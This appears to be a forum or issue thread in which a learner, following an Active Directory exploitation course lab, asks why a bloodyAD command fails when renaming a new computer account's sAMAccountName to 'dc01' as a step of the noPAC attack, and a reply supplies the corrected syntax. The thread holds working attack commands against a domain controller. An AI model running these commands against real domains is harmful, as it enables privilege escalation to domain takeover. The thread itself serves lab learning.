Hi,

I am trying to exploit the noPAC vulnerabilities in a step-by-step, kind of manual way for understanding purposes as I read thought an AD exploitation course. One step of the exploitation process includes modifying the name of a freshly created computer account. I would think this action is doable with bloodyAD but am struggling to actually perform it.
Here the command I'm using and the ouput I get:

# I can get the sAMAccountName of my newly created computer
$ proxychains bloodyad -u user -p 'pass' -d inlanefreight.local --host 172.16.5.5 get object 'cptr$' --attr sAMAccountName
{
  "sAMAccountName": "cptr$"
}

# I am now trying to set it to a new value but can't
$  proxychains bloodyad -u user -p 'pass' -d inlanefreight.local --host 172.16.5.5 set object 'cptr$' sAMAccountName 'dc01'
[proxychains] config file found: /etc/proxychains.conf
[proxychains] preloading /usr/lib/libproxychains4.so
[proxychains] DLL init: proxychains-ng
usage: bloodyad set [-h] {password} ...
bloodyad set: error: argument {password}: invalid choice: 'object' (choose from 'password')

Shouldn't this normally work ? I am a bit confused by the documentation which has three subsections for "set" actions: set object, set password and set owner. Is set object an actual command or just a kind of placeholder to refer to the set passwordand set owner ?

Thank you very much !

Hello, I agree the error message is a bit confusing.
set object is indeed an actual command that is documented here or you can do set object -h for more information. You'll see that you have to provide the -v option flag to pass a value which will end up as set object 'cptr$' sAMAccountName -v 'dc01'.
Tell me if everything works